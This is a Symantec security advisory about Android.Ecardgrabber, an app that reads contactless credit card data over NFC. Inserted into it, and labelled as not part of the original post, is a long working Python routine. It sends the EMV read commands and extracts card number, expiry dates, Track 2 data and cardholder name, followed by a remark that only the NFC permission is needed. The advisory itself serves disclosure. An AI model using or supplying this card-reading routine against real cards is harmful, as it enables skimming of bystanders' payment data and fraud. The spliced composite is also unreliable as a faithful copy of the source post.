Security Response

Ecardgrabber: Android App Sniffing Contactless Credit Card Details over the Air

Created: 22 Jun 2012 21:27:23 GMT • Updated: 23 Jan 2014 18:14:34 GMT • Translations available: 日本語
Irfan Asrar

A security researcher in Germany released an Android application on Google Play that can read contactless credit card data over the air from a limited set of cards. Contactless credit cards can typically be used without a PIN for transactions under €10, simply by holding the card near a point-of-sale terminal.

The application, which Symantec detects as Android.Ecardgrabber, reads this data using Near Field Communication (NFC), a short-range radio technology present in the latest smartphones. The app was posted on Google Play on June 13 and was downloaded 100-500 times before it was removed.
What is Near Field Communication?

Near Field Communication enables contactless data exchange at short distances.
From the official Android Developer Site:

Near Field Communication (NFC) is a set of short-range wireless technologies, typically requiring a distance of 4cm or less to initiate a connection. NFC allows you to share small payloads of data between an NFC tag and an Android-powered device, or between two Android-powered devices.
Information retrieval

An analysis of the Android.Ecardgrabber code shows that the author attempted to support retrieving information from eight different credit card providers. One provider is shown below:

[Figure: code excerpt for one of the supported card providers]
By the author's own admission, the app was only successfully tested against two credit card systems, and the code is in an incomplete state.

Attempts were made against:

  • MasterCard*
  • GeldKarte*
  • Visa V Pay**
  • Cirrus**
  • Maestro**
  • Visa Electron**
  • Visa**

*Verified successful by author
**Unverified but in the code

We were unable to get the application to retrieve the credit card details; however, we only had a Polish Payless MasterCard at our disposal, so this was to be expected.

The application is capable of retrieving the following information:

  • Credit card number
  • Valid from date
  • Expiration date
  • Bank account number

Note: Nowhere in the code did we see the card security code (the printed CVV2) extracted.
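A worked example of the read described above, added here and not taken from the Symantec post or from the Ecardgrabber app itself: it builds the EMV contactless APDU sequence (SELECT PPSE, SELECT AID, GET PROCESSING OPTIONS, READ RECORD) that a phone would send through Android's IsoDep.transceive(), and parses the BER-TLV record a card returns into the fields listed above. The AIDs and tag numbers are public EMV values; the READ RECORD response is a constructed sample built around a test PAN, and the GeldKarte application, which the post lists but whose file layout it does not describe, is not modelled.

```python
# Added example, not code from the Symantec post or from the Ecardgrabber app.
# It shows the EMV contactless read an app like Android.Ecardgrabber has to
# perform over NFC (SELECT PPSE -> SELECT AID -> GET PROCESSING OPTIONS ->
# READ RECORD) and parses the BER-TLV record that comes back into the fields
# the post lists. On a phone the APDUs would be carried by Android's
# IsoDep.transceive(); here the card's READ RECORD response is a constructed
# sample (test PAN 4111111111111111) so the code runs offline.

PPSE_NAME = b"2PAY.SYS.DDF01"          # Proximity Payment System Environment (EMV contactless)
AIDS = {                                # public EMV application identifiers
    "MasterCard": bytes.fromhex("A0000000041010"),
    "Visa":       bytes.fromhex("A0000000031010"),
    "Maestro":    bytes.fromhex("A0000000043060"),
}


def select_apdu(name: bytes) -> bytes:
    """SELECT by name: CLA=00 INS=A4 P1=04 (by DF name) P2=00, Lc, name, Le=00."""
    return bytes([0x00, 0xA4, 0x04, 0x00, len(name)]) + name + b"\x00"


def read_record_apdu(sfi: int, record: int) -> bytes:
    """READ RECORD: CLA=00 INS=B2 P1=record number P2=(SFI<<3)|4, Le=00."""
    return bytes([0x00, 0xB2, record, (sfi << 3) | 0x04, 0x00])


def card_read_sequence(aid: bytes, sfi: int = 1, record: int = 1) -> list:
    """The APDUs a reader sends, in order, to reach the card's data records.
    GPO is sent with empty PDOL data (83 00); a real terminal fills in the PDOL
    the card requested in its FCI, which Visa contactless cards insist on."""
    gpo = bytes.fromhex("80A8000002830000")
    return [select_apdu(PPSE_NAME), select_apdu(aid), gpo, read_record_apdu(sfi, record)]


def parse_tlv(data: bytes) -> dict:
    """Minimal BER-TLV parser (EMV Book 3, Annex B). Constructed templates such
    as 70/77/6F/A5 are recursed into and the result is flattened by hex tag."""
    out, i = {}, 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):         # inter-object padding
            i += 1
            continue
        start = i
        constructed = bool(data[i] & 0x20)  # bit 6 of the first tag byte
        if data[i] & 0x1F == 0x1F:          # multi-byte tag: continue while bit 8 set
            i += 1
            while data[i] & 0x80:
                i += 1
        i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                   # long-form length: 0x8N then N length bytes
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if constructed:
            out.update(parse_tlv(value))
        else:
            out[tag] = value
    return out


def extract_card_details(response: bytes) -> dict:
    """Pull the fields the post lists out of a READ RECORD response.
    The printed CVV2 is not stored on the chip; Track 2 equivalent data
    carries a chip-specific iCVV instead, so no tag ever yields 'cvv2'."""
    if len(response) < 2 or response[-2:] != b"\x90\x00":
        raise ValueError("card returned error status %s" % response[-2:].hex())
    tlv = parse_tlv(response[:-2])
    details = {}
    if "5A" in tlv:                                   # Application PAN, BCD, F-padded
        details["pan"] = tlv["5A"].hex().upper().rstrip("F")
    if "5F24" in tlv:                                 # expiration date YYMMDD
        h = tlv["5F24"].hex()
        details["expiry"] = "20%s-%s-%s" % (h[0:2], h[2:4], h[4:6])
    if "5F25" in tlv:                                 # effective ("valid from") date YYMMDD
        h = tlv["5F25"].hex()
        details["valid_from"] = "20%s-%s-%s" % (h[0:2], h[2:4], h[4:6])
    if "57" in tlv:                                   # Track 2 equivalent: PAN 'D' YYMM SVC disc.
        pan, rest = tlv["57"].hex().upper().split("D", 1)
        details.setdefault("pan", pan)
        details["track2_expiry_yymm"] = rest[:4]
        details["service_code"] = rest[4:7]
    if "5F20" in tlv:                                 # cardholder name, if personalised
        details["cardholder_name"] = tlv["5F20"].decode("ascii").strip()
    return details


# Constructed sample READ RECORD response (not captured from a real card).
SAMPLE_READ_RECORD_RESPONSE = bytes.fromhex(
    "7032"                                          # tag 70 record template, 50 bytes
    "5A08" "4111111111111111"                       # 5A   PAN (Visa test number)
    "5F2403" "141231"                               # 5F24 expiry 2014-12-31
    "5F2503" "120101"                               # 5F25 valid from 2012-01-01
    "5712" "4111111111111111D141220100000000000F"   # 57   Track 2 equivalent data
    "5F2005" "4A20444F45"                           # 5F20 cardholder name "J DOE"
    "9000"                                          # SW1 SW2: success
)

if __name__ == "__main__":
    for apdu in card_read_sequence(AIDS["MasterCard"]):
        print("-> " + apdu.hex().upper())
    print(extract_card_details(SAMPLE_READ_RECORD_RESPONSE))
```

On a phone, each APDU in card_read_sequence() goes to IsoDep.transceive() and the reply is fed to extract_card_details(); the only permission the app needs for this is android.permission.NFC, and the card must be inside the roughly 4 cm range the Android documentation quotes. The parser deliberately returns no security code: the chip holds an iCVV in the Track 2 equivalent data, not the CVV2 printed on the back of the card, which is consistent with the observation that Android.Ecardgrabber never extracts one.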

Although this application requires the user to install it and to place a contactless payment card within 4 centimetres of the phone before any details are exposed, it does highlight a potential weakness in this emerging technology. It is not hard to imagine a malicious application running silently in the background of a mobile device and talking to the contactless credit card in the wallet next to it.

Near Field Communication is a new technology that promises to make life simpler and more interactive, but users should be aware of the security concerns that are easily overlooked.